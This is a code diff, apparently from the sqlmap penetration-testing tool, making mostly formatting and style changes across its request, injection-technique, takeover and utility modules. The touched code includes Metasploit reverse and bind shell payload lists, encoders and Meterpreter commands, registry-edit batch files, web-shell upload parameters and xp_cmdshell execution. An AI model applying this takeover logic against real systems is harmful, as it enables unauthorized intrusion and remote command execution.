if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
warnMsg = "large compressed response detected. Disabling compression"
@ -241,27 +240,27 @@ class Connect(object):
kb.requestCounter += 1
threadData.lastRequestUID = kb.requestCounter
url = kwargs.get("url", None) or conf.url
get = kwargs.get("get", None)
post = kwargs.get("post", None)
method = kwargs.get("method", None)
cookie = kwargs.get("cookie", None)
ua = kwargs.get("ua", None) or conf.agent
referer = kwargs.get("referer", None) or conf.referer
host = kwargs.get("host", None) or conf.host
direct_ = kwargs.get("direct", False)
multipart = kwargs.get("multipart", None)
silent = kwargs.get("silent", False)
raise404 = kwargs.get("raise404", True)
timeout = kwargs.get("timeout", None) or conf.timeout
auxHeaders = kwargs.get("auxHeaders", None)
response = kwargs.get("response", False)
url = kwargs.get("url", None) or conf.url
get = kwargs.get("get", None)
post = kwargs.get("post", None)
method = kwargs.get("method", None)
cookie = kwargs.get("cookie", None)
ua = kwargs.get("ua", None) or conf.agent
referer = kwargs.get("referer", None) or conf.referer
host = kwargs.get("host", None) or conf.host
direct_ = kwargs.get("direct", False)
multipart = kwargs.get("multipart", None)
silent = kwargs.get("silent", False)
raise404 = kwargs.get("raise404", True)
timeout = kwargs.get("timeout", None) or conf.timeout
auxHeaders = kwargs.get("auxHeaders", None)
response = kwargs.get("response", False)
ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts
refreshing = kwargs.get("refreshing", False)
retrying = kwargs.get("retrying", False)
crawling = kwargs.get("crawling", False)
checking = kwargs.get("checking", False)
skipRead = kwargs.get("skipRead", False)
refreshing = kwargs.get("refreshing", False)
retrying = kwargs.get("retrying", False)
crawling = kwargs.get("crawling", False)
checking = kwargs.get("checking", False)
skipRead = kwargs.get("skipRead", False)
if multipart:
post = multipart
@ -1040,7 +1039,7 @@ class Connect(object):
name = safeVariableNaming(name)
elif name in keywords:
name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
value = urldecode(value, convall=True, spaceplus=(item==post and kb.postSpaceToPlus))
value = urldecode(value, convall=True, spaceplus=(item == post and kb.postSpaceToPlus))
variables[name] = value
if cookie:

2
lib/request/httpshandler.py
View File

@ -48,7 +48,7 @@ class HTTPSConnection(httplib.HTTPSConnection):
# Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
# https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) != False and hasattr(ssl, "SSLContext"):
if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) is not False and hasattr(ssl, "SSLContext"):
for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols):
try:
sock = create_sock()

5
lib/request/inject.py
View File

@ -175,10 +175,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char
# forge the SQL limiting the query output one entry at a time
# NOTE: we assume that only queries that get data from a table
# can return multiple entries
if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \
not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \
expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \
and not re.search(SQL_SCALAR_REGEX, expression, re.I):
if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression)
if limitCond:

1
lib/request/templates.py
View File

@ -19,4 +19,3 @@ def getPageTemplate(payload, place):
retVal = kb.pageTemplates[(payload, place)]
return retVal

6
lib/takeover/abstraction.py
View File

@ -172,9 +172,9 @@ class Abstraction(Web, UDF, XP_cmdshell):
inject.goStacked(expression)
# TODO: add support for PostgreSQL
#elif Backend.isDbms(DBMS.PGSQL):
# expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1")
# inject.goStacked(expression)
# elif Backend.isDbms(DBMS.PGSQL):
# expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1")
# inject.goStacked(expression)
def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False):
self._initRunAs()

104
lib/takeover/metasploit.py
View File

@ -81,6 +81,7 @@ class Metasploit:
_ = normalizePath(os.path.join(_, ".."))
if _ == old:
break
self._msfCli = "%s & ruby %s" % (_, self._msfCli)
self._msfConsole = "%s & ruby %s" % (_, self._msfConsole)
self._msfEncode = "ruby %s" % self._msfEncode
@ -88,60 +89,60 @@ class Metasploit:
self._msfVenom = "%s & ruby %s" % (_, self._msfVenom)
self._msfPayloadsList = {
"windows": {
1: ("Meterpreter (default)", "windows/meterpreter"),
2: ("Shell", "windows/shell"),
3: ("VNC", "windows/vncinject"),
},
"linux": {
1: ("Shell (default)", "linux/x86/shell"),
2: ("Meterpreter (beta)", "linux/x86/meterpreter"),
}
}
"windows": {
1: ("Meterpreter (default)", "windows/meterpreter"),
2: ("Shell", "windows/shell"),
3: ("VNC", "windows/vncinject"),
},
"linux": {
1: ("Shell (default)", "linux/x86/shell"),
2: ("Meterpreter (beta)", "linux/x86/meterpreter"),
}
}
self._msfConnectionsList = {
"windows": {
1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"),
3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"),
4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"),
5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
},
"linux": {
1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
}
}
"windows": {
1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"),
3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"),
4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"),
5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
},
"linux": {
1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
}
}
self._msfEncodersList = {
"windows": {
1: ("No Encoder", "generic/none"),
2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"),
3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"),
4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"),
5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"),
6: ("Single-byte XOR Countdown Encoder", "x86/countdown"),
7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"),
8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"),
9: ("Non-Alpha Encoder", "x86/nonalpha"),
10: ("Non-Upper Encoder", "x86/nonupper"),
11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"),
12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"),
13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"),
}
}
"windows": {
1: ("No Encoder", "generic/none"),
2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"),
3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"),
4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"),
5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"),
6: ("Single-byte XOR Countdown Encoder", "x86/countdown"),
7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"),
8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"),
9: ("Non-Alpha Encoder", "x86/nonalpha"),
10: ("Non-Upper Encoder", "x86/nonupper"),
11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"),
12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"),
13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"),
}
}
self._msfSMBPortsList = {
"windows": {
1: ("139/TCP", "139"),
2: ("445/TCP (default)", "445"),
}
}
"windows": {
1: ("139/TCP", "139"),
2: ("445/TCP (default)", "445"),
}
}
self._portData = {
"bind": "remote port number",
"reverse": "local port number",
}
"bind": "remote port number",
"reverse": "local port number",
}
def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1):
if Backend.isOs(OS.WINDOWS):
@ -484,10 +485,13 @@ class Metasploit:
send_all(proc, "use espia\n")
send_all(proc, "use incognito\n")
# This extension is loaded by default since Metasploit > 3.7
#send_all(proc, "use priv\n")
# This extension freezes the connection on 64-bit systems
#send_all(proc, "use sniffer\n")
# This extension is loaded by default since Metasploit > 3.7:
# send_all(proc, "use priv\n")
# This extension freezes the connection on 64-bit systems:
# send_all(proc, "use sniffer\n")
send_all(proc, "sysinfo\n")
send_all(proc, "getuid\n")

18
lib/takeover/registry.py
View File

@ -33,19 +33,19 @@ class Registry:
readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\""
self._batRead = (
"@ECHO OFF\r\n",
readParse,
)
"@ECHO OFF\r\n",
readParse,
)
self._batAdd = (
"@ECHO OFF\r\n",
"REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData),
)
"@ECHO OFF\r\n",
"REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData),
)
self._batDel = (
"@ECHO OFF\r\n",
"REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue),
)
"@ECHO OFF\r\n",
"REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue),
)
def _createLocalBatchFile(self):
self._batPathFp = open(self._batPathLocal, "w")

8
lib/takeover/web.py
View File

@ -112,10 +112,10 @@ class Web:
if self.webApi in getPublicTypeMembers(WEB_API, True):
multipartParams = {
"upload": "1",
"file": stream,
"uploadDir": directory,
}
"upload": "1",
"file": stream,
"uploadDir": directory,
}
if self.webApi == WEB_API.ASPX:
multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION

2
lib/takeover/xp_cmdshell.py
View File

@ -214,7 +214,7 @@ class XP_cmdshell:
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
output = inject.getValue(query, resumeValue=False, blind=False, time=False)
if (output is None) or len(output)==0 or output[0] is None:
if (output is None) or len(output) == 0 or output[0] is None:
output = []
count = inject.getValue("SELECT COUNT(id) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)

2
lib/techniques/blind/inference.py
View File

@ -611,7 +611,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# If we had no luck with commonValue and common charset,
# use the returned other charset
if not val:
val = getChar(index, otherCharset, otherCharset==asciiTbl)
val = getChar(index, otherCharset, otherCharset == asciiTbl)
else:
val = getChar(index, asciiTbl, not(charsetType is None and conf.charset))

30
lib/techniques/error/use.py
View File

@ -133,20 +133,23 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
# Parse the returned page to get the exact error-based
# SQL injection output
output = reduce(lambda x, y: x if x is not None else y, (\
extractRegexResult(check, page), \
extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), \
extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), \
extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)), \
None)
output = reduce(lambda x, y: x if x is not None else y, (
extractRegexResult(check, page),
extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),
extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)),
None
)
if output is not None:
output = getUnicode(output)
else:
trimmed = extractRegexResult(trimcheck, page) \
or extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) \
or extractRegexResult(trimcheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)) \
or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
trimmed = (
extractRegexResult(trimcheck, page) or
extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) or
extractRegexResult(trimcheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)) or
extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
)
if trimmed:
if not chunkTest:
@ -308,12 +311,7 @@ def errorUse(expression, dump=False):
# entry at a time
# NOTE: we assume that only queries that get data from a table can
# return multiple entries
if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in \
expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) \
or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \
expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \
and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) \
and not re.search(SQL_SCALAR_REGEX, expression, re.I):
if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump)
if limitCond:

8
lib/techniques/union/use.py
View File

@ -233,13 +233,7 @@ def unionUse(expression, unpack=True, dump=False):
# SQL limiting the query output one entry at a time
# NOTE: we assume that only queries that get data from a table can
# return multiple entries
if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \
kb.forcePartialUnion or \
(dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \
" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \
not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \
and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \
and not re.search(SQL_SCALAR_REGEX, expression, re.I):
if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or kb.forcePartialUnion or (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump)
if limitCond:

21
lib/utils/api.py
View File

@ -94,7 +94,7 @@ class Database(object):
else:
self.cursor.execute(statement)
except sqlite3.OperationalError, ex:
if not "locked" in getSafeExString(ex):
if "locked" not in getSafeExString(ex):
raise
else:
break
@ -103,22 +103,11 @@ class Database(object):
return self.cursor.fetchall()
def init(self):
self.execute("CREATE TABLE logs("
"id INTEGER PRIMARY KEY AUTOINCREMENT, "
"taskid INTEGER, time TEXT, "
"level TEXT, message TEXT"
")")
self.execute("CREATE TABLE logs(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, time TEXT, level TEXT, message TEXT)")
self.execute("CREATE TABLE data("
"id INTEGER PRIMARY KEY AUTOINCREMENT, "
"taskid INTEGER, status INTEGER, "
"content_type INTEGER, value TEXT"
")")
self.execute("CREATE TABLE data(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, status INTEGER, content_type INTEGER, value TEXT)")
self.execute("CREATE TABLE errors("
"id INTEGER PRIMARY KEY AUTOINCREMENT, "
"taskid INTEGER, error TEXT"
")")
self.execute("CREATE TABLE errors(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, error TEXT)")
class Task(object):
def __init__(self, taskid, remote_addr):
@ -860,7 +849,7 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=Non
return
elif command in ("help", "?"):
msg = "help Show this help message\n"
msg = "help Show this help message\n"
msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n"
msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n"
msg += "data Retrieve and show data for current task\n"

2
lib/utils/crawler.py
View File

@ -167,7 +167,7 @@ def crawl(target):
if not conf.bulkFile:
logger.info("searching for links with depth %d" % (i + 1))
runThreads(numThreads, crawlThread, threadChoice=(i>0))
runThreads(numThreads, crawlThread, threadChoice=(i > 0))
clearConsoleLine(True)
if threadData.shared.deeper:

1
lib/utils/deps.py
View File

@ -108,4 +108,3 @@ def checkDependencies():
if len(missing_libraries) == 0:
infoMsg = "all dependencies are installed"
logger.info(infoMsg)

5
lib/utils/getch.py
View File

@ -25,7 +25,7 @@ class _Getch(object):
class _GetchUnix(object):
def __init__(self):
import tty
__import__("tty")
def __call__(self):
import sys
@ -44,7 +44,7 @@ class _GetchUnix(object):
class _GetchWindows(object):
def __init__(self):
import msvcrt
__import__("msvcrt")
def __call__(self):
import msvcrt
@ -81,4 +81,3 @@ class _GetchMacCarbon(object):
getch = _Getch()

71
lib/utils/hash.py
View File

@ -135,7 +135,6 @@ def postgres_passwd(password, username, uppercase=False):
'md599e5ea7a6f7c3269995cba3927fd0093'
"""
if isinstance(username, unicode):
username = unicode.encode(username, UNICODE_ENCODING)
@ -380,7 +379,7 @@ def unix_md5_passwd(password, salt, magic="$1$", **kwargs):
ctx = password + magic + salt
final = md5(password + salt + password).digest()
for pl in xrange(len(password),0,-16):
for pl in xrange(len(password), 0, -16):
if pl > 16:
ctx = ctx + final[:16]
else:
@ -389,7 +388,7 @@ def unix_md5_passwd(password, salt, magic="$1$", **kwargs):
i = len(password)
while i:
if i & 1:
ctx = ctx + chr(0) #if ($i & 1) { $ctx->add(pack("C", 0)); }
ctx = ctx + chr(0) # if ($i & 1) { $ctx->add(pack("C", 0)); }
else:
ctx = ctx + password[0]
i = i >> 1
@ -417,7 +416,7 @@ def unix_md5_passwd(password, salt, magic="$1$", **kwargs):
final = md5(ctx1).digest()
hash_ = _encode64((int(ord(final[0])) << 16) | (int(ord(final[6])) << 8) | (int(ord(final[12]))),4)
hash_ = _encode64((int(ord(final[0])) << 16) | (int(ord(final[6])) << 8) | (int(ord(final[12]))), 4)
hash_ = hash_ + _encode64((int(ord(final[1])) << 16) | (int(ord(final[7])) << 8) | (int(ord(final[13]))), 4)
hash_ = hash_ + _encode64((int(ord(final[2])) << 16) | (int(ord(final[8])) << 8) | (int(ord(final[14]))), 4)
hash_ = hash_ + _encode64((int(ord(final[3])) << 16) | (int(ord(final[9])) << 8) | (int(ord(final[15]))), 4)
@ -522,38 +521,38 @@ def wordpress_passwd(password, salt, count, prefix, **kwargs):
return "%s%s" % (prefix, _encode64(hash_, 16))
__functions__ = {
HASH.MYSQL: mysql_passwd,
HASH.MYSQL_OLD: mysql_old_passwd,
HASH.POSTGRES: postgres_passwd,
HASH.MSSQL: mssql_passwd,
HASH.MSSQL_OLD: mssql_old_passwd,
HASH.MSSQL_NEW: mssql_new_passwd,
HASH.ORACLE: oracle_passwd,
HASH.ORACLE_OLD: oracle_old_passwd,
HASH.MD5_GENERIC: md5_generic_passwd,
HASH.SHA1_GENERIC: sha1_generic_passwd,
HASH.SHA224_GENERIC: sha224_generic_passwd,
HASH.SHA256_GENERIC: sha256_generic_passwd,
HASH.SHA384_GENERIC: sha384_generic_passwd,
HASH.SHA512_GENERIC: sha512_generic_passwd,
HASH.CRYPT_GENERIC: crypt_generic_passwd,
HASH.JOOMLA: joomla_passwd,
HASH.DJANGO_MD5: django_md5_passwd,
HASH.DJANGO_SHA1: django_sha1_passwd,
HASH.WORDPRESS: wordpress_passwd,
HASH.APACHE_MD5_CRYPT: unix_md5_passwd,
HASH.UNIX_MD5_CRYPT: unix_md5_passwd,
HASH.APACHE_SHA1: apache_sha1_passwd,
HASH.VBULLETIN: vbulletin_passwd,
HASH.VBULLETIN_OLD: vbulletin_passwd,
HASH.SSHA: ssha_passwd,
HASH.SSHA256: ssha256_passwd,
HASH.SSHA512: ssha512_passwd,
HASH.MD5_BASE64: md5_generic_passwd,
HASH.SHA1_BASE64: sha1_generic_passwd,
HASH.SHA256_BASE64: sha256_generic_passwd,
HASH.SHA512_BASE64: sha512_generic_passwd,
}
HASH.MYSQL: mysql_passwd,
HASH.MYSQL_OLD: mysql_old_passwd,
HASH.POSTGRES: postgres_passwd,
HASH.MSSQL: mssql_passwd,
HASH.MSSQL_OLD: mssql_old_passwd,
HASH.MSSQL_NEW: mssql_new_passwd,
HASH.ORACLE: oracle_passwd,
HASH.ORACLE_OLD: oracle_old_passwd,
HASH.MD5_GENERIC: md5_generic_passwd,
HASH.SHA1_GENERIC: sha1_generic_passwd,
HASH.SHA224_GENERIC: sha224_generic_passwd,
HASH.SHA256_GENERIC: sha256_generic_passwd,
HASH.SHA384_GENERIC: sha384_generic_passwd,
HASH.SHA512_GENERIC: sha512_generic_passwd,
HASH.CRYPT_GENERIC: crypt_generic_passwd,
HASH.JOOMLA: joomla_passwd,
HASH.DJANGO_MD5: django_md5_passwd,
HASH.DJANGO_SHA1: django_sha1_passwd,
HASH.WORDPRESS: wordpress_passwd,
HASH.APACHE_MD5_CRYPT: unix_md5_passwd,
HASH.UNIX_MD5_CRYPT: unix_md5_passwd,
HASH.APACHE_SHA1: apache_sha1_passwd,
HASH.VBULLETIN: vbulletin_passwd,
HASH.VBULLETIN_OLD: vbulletin_passwd,
HASH.SSHA: ssha_passwd,
HASH.SSHA256: ssha256_passwd,
HASH.SSHA512: ssha512_passwd,
HASH.MD5_BASE64: md5_generic_passwd,
HASH.SHA1_BASE64: sha1_generic_passwd,
HASH.SHA256_BASE64: sha256_generic_passwd,
HASH.SHA512_BASE64: sha512_generic_passwd,
}
def storeHashesToFile(attack_dict):
if not attack_dict:

504
lib/utils/htmlentities.py
View File

@ -8,256 +8,256 @@ See the file 'LICENSE' for copying permission
# Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html
htmlEntities = {
'quot': 34,
'amp': 38,
'lt': 60,
'gt': 62,
'nbsp': 160,
'iexcl': 161,
'cent': 162,
'pound': 163,
'curren': 164,
'yen': 165,
'brvbar': 166,
'sect': 167,
'uml': 168,
'copy': 169,
'ordf': 170,
'laquo': 171,
'not': 172,
'shy': 173,
'reg': 174,
'macr': 175,
'deg': 176,
'plusmn': 177,
'sup2': 178,
'sup3': 179,
'acute': 180,
'micro': 181,
'para': 182,
'middot': 183,
'cedil': 184,
'sup1': 185,
'ordm': 186,
'raquo': 187,
'frac14': 188,
'frac12': 189,
'frac34': 190,
'iquest': 191,
'Agrave': 192,
'Aacute': 193,
'Acirc': 194,
'Atilde': 195,
'Auml': 196,
'Aring': 197,
'AElig': 198,
'Ccedil': 199,
'Egrave': 200,
'Eacute': 201,
'Ecirc': 202,
'Euml': 203,
'Igrave': 204,
'Iacute': 205,
'Icirc': 206,
'Iuml': 207,
'ETH': 208,
'Ntilde': 209,
'Ograve': 210,
'Oacute': 211,
'Ocirc': 212,
'Otilde': 213,
'Ouml': 214,
'times': 215,
'Oslash': 216,
'Ugrave': 217,
'Uacute': 218,
'Ucirc': 219,
'Uuml': 220,
'Yacute': 221,
'THORN': 222,
'szlig': 223,
'agrave': 224,
'aacute': 225,
'acirc': 226,
'atilde': 227,
'auml': 228,
'aring': 229,
'aelig': 230,
'ccedil': 231,
'egrave': 232,
'eacute': 233,
'ecirc': 234,
'euml': 235,
'igrave': 236,
'iacute': 237,
'icirc': 238,
'iuml': 239,
'eth': 240,
'ntilde': 241,
'ograve': 242,
'oacute': 243,
'ocirc': 244,
'otilde': 245,
'ouml': 246,
'divide': 247,
'oslash': 248,
'ugrave': 249,
'uacute': 250,
'ucirc': 251,
'uuml': 252,
'yacute': 253,
'thorn': 254,
'yuml': 255,
'OElig': 338,
'oelig': 339,
'Scaron': 352,
'fnof': 402,
'scaron': 353,
'Yuml': 376,
'circ': 710,
'tilde': 732,
'Alpha': 913,
'Beta': 914,
'Gamma': 915,
'Delta': 916,
'Epsilon': 917,
'Zeta': 918,
'Eta': 919,
'Theta': 920,
'Iota': 921,
'Kappa': 922,
'Lambda': 923,
'Mu': 924,
'Nu': 925,
'Xi': 926,
'Omicron': 927,
'Pi': 928,
'Rho': 929,
'Sigma': 931,
'Tau': 932,
'Upsilon': 933,
'Phi': 934,
'Chi': 935,
'Psi': 936,
'Omega': 937,
'alpha': 945,
'beta': 946,
'gamma': 947,
'delta': 948,
'epsilon': 949,
'zeta': 950,
'eta': 951,
'theta': 952,
'iota': 953,
'kappa': 954,
'lambda': 955,
'mu': 956,
'nu': 957,
'xi': 958,
'omicron': 959,
'pi': 960,
'rho': 961,
'sigmaf': 962,
'sigma': 963,
'tau': 964,
'upsilon': 965,
'phi': 966,
'chi': 967,
'psi': 968,
'omega': 969,
'thetasym': 977,
'upsih': 978,
'piv': 982,
'bull': 8226,
'hellip': 8230,
'prime': 8242,
'Prime': 8243,
'oline': 8254,
'frasl': 8260,
'ensp': 8194,
'emsp': 8195,
'thinsp': 8201,
'zwnj': 8204,
'zwj': 8205,
'lrm': 8206,
'rlm': 8207,
'ndash': 8211,
'mdash': 8212,
'lsquo': 8216,
'rsquo': 8217,
'sbquo': 8218,
'ldquo': 8220,
'rdquo': 8221,
'bdquo': 8222,
'dagger': 8224,
'Dagger': 8225,
'permil': 8240,
'lsaquo': 8249,
'rsaquo': 8250,
'euro': 8364,
'weierp': 8472,
'image': 8465,
'real': 8476,
'trade': 8482,
'alefsym': 8501,
'larr': 8592,
'uarr': 8593,
'rarr': 8594,
'darr': 8595,
'harr': 8596,
'crarr': 8629,
'lArr': 8656,
'uArr': 8657,
'rArr': 8658,
'dArr': 8659,
'hArr': 8660,
'forall': 8704,
'part': 8706,
'exist': 8707,
'empty': 8709,
'nabla': 8711,
'isin': 8712,
'notin': 8713,
'ni': 8715,
'prod': 8719,
'sum': 8721,
'minus': 8722,
'lowast': 8727,
'radic': 8730,
'prop': 8733,
'infin': 8734,
'ang': 8736,
'and': 8743,
'or': 8744,
'cap': 8745,
'cup': 8746,
'int': 8747,
'there4': 8756,
'sim': 8764,
'cong': 8773,
'asymp': 8776,
'ne': 8800,
'equiv': 8801,
'le': 8804,
'ge': 8805,
'sub': 8834,
'sup': 8835,
'nsub': 8836,
'sube': 8838,
'supe': 8839,
'oplus': 8853,
'otimes': 8855,
'perp': 8869,
'sdot': 8901,
'lceil': 8968,
'rceil': 8969,
'lfloor': 8970,
'rfloor': 8971,
'lang': 9001,
'rang': 9002,
'loz': 9674,
'spades': 9824,
'clubs': 9827,
'hearts': 9829,
'diams': 9830,
"quot": 34,
"amp": 38,
"lt": 60,
"gt": 62,
"nbsp": 160,
"iexcl": 161,
"cent": 162,
"pound": 163,
"curren": 164,
"yen": 165,
"brvbar": 166,
"sect": 167,
"uml": 168,
"copy": 169,
"ordf": 170,
"laquo": 171,
"not": 172,
"shy": 173,
"reg": 174,
"macr": 175,
"deg": 176,
"plusmn": 177,
"sup2": 178,
"sup3": 179,
"acute": 180,
"micro": 181,
"para": 182,
"middot": 183,
"cedil": 184,
"sup1": 185,
"ordm": 186,
"raquo": 187,
"frac14": 188,
"frac12": 189,
"frac34": 190,
"iquest": 191,
"Agrave": 192,
"Aacute": 193,
"Acirc": 194,
"Atilde": 195,
"Auml": 196,
"Aring": 197,
"AElig": 198,
"Ccedil": 199,
"Egrave": 200,
"Eacute": 201,
"Ecirc": 202,
"Euml": 203,
"Igrave": 204,
"Iacute": 205,
"Icirc": 206,
"Iuml": 207,
"ETH": 208,
